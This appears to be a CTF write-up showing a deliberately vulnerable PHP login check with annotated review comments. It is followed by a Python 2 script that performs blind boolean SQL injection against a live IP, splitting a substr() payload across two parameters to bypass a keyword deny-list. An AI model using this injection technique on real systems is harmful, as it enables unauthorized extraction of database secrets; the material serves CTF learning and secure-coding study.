CTF
[H3XOR]column test
shnec
2017. 8. 2. 12:11
/*
 * if you see the password column name,
 * you will get the flag~!
 *
 * Reviewer notes: challenge source, vulnerable by design. $conn, $table,
 * $id_column_name and $pw_column_name are not defined in this listing;
 * presumably dbconfig.php sets them (TODO confirm).
 */
include("./dbconfig.php");

// Raw query-string values; nothing below validates, casts or escapes them.
$id = $_GET['id'];
$pw = $_GET['pw'];

// Both variables were assigned just above, so isset() is false only when the
// corresponding GET parameter was absent (null).
if ( isset($id) || isset($pw) ) {
    // Deny-list: rejects "info" / "sche" (case-insensitive) in either value, and
    // a comma in $id only. Presumably meant to keep information_schema out of
    // reach. It does not stop quote characters, so it is not an injection control.
    if (preg_match("/info|sche|,/i", $id)) exit("no hack ~_~");
    if (preg_match("/info|sche/i", $pw)) exit("no hack ~_~");

    // Injection point: $id and $pw are interpolated inside single-quoted SQL
    // literals with no escaping, so a quote in either value ends the literal and
    // the remainder is parsed as SQL. The column names the challenge treats as
    // secret are part of this same statement text, so hiding them protects
    // nothing once the statement can be reshaped. In real code the fix is a
    // prepared statement (mysqli_prepare + mysqli_stmt_bind_param) with $id and
    // $pw bound as parameters.
    $query = "SELECT {$pw_column_name}, {$id_column_name} FROM {$table} WHERE {$id_column_name}='{$id}' AND {$pw_column_name}='{$pw}'";

    // The return value of mysqli_query() is passed on without a failure check.
    $result = mysqli_fetch_array(mysqli_query($conn ,$query));

    // Two distinguishable responses, depending on whether a row with a truthy
    // 'id' field came back. That difference acts as a yes/no oracle for any
    // condition an altered WHERE clause evaluates.
    // NOTE(review): the 'id' key exists only if the id column is literally
    // named "id" - confirm against dbconfig.php.
    if ($result['id']) {
        echo "Hello {$result['id']}";
    } else {
        echo "DB error";
    }
} else {
    // No parameters supplied: print this file's own source.
    highlight_file(__FILE__);
}
import request
def hexor():
    """Recover nine characters, one bit at a time, from the challenge's yes/no response.

    For each character position 1..9 the function sends eight requests, one per
    bit from 128 down to 1, and treats a response without 'Hello guest' as
    "value >= threshold". The recovered bytes are printed and concatenated
    into `password`.

    NOTE(review): the page shows this script flattened onto one line, so the
    indentation here is reconstructed; the placement of `print res` and of the
    commented-out lines is a best guess. The code uses Python 2 print
    statements. The listing's import line names `request`, while this
    function calls `requests`.
    """
    # This first assignment is overwritten inside the loop before any request is sent.
    param={'id':"123' union select 2,",'pw':"#"}
    password=''
    for ind in range(1,10):
        # p accumulates the character code for position `ind`.
        p=0
        for x in range(7,-1,-1):
            # The expression is split across the two parameters: `id` ends with an
            # open substr( call and `pw` begins with its remaining arguments, so the
            # statement text the server places between the two values becomes the
            # string being read. Neither half contains "info" or "sche", and the
            # comma is only in `pw`, so the server's deny-list does not match.
            param={'id':"123' or ascii(substr(",'pw':",{},1))<{}#".format(ind,p+2**x)}
            res=requests.get('http://13.124.1.51/web/prob15/?id=info',params=param).text
            # Comparison "< threshold" was false, so this bit belongs to the value.
            if 'Hello guest' not in res:
                p+=2**x
            #print p
            print res
            #time.sleep(10000)
        print p
        print '[**]'+chr(p)
        password+=chr(p)
    print 'password: '+password
hexor()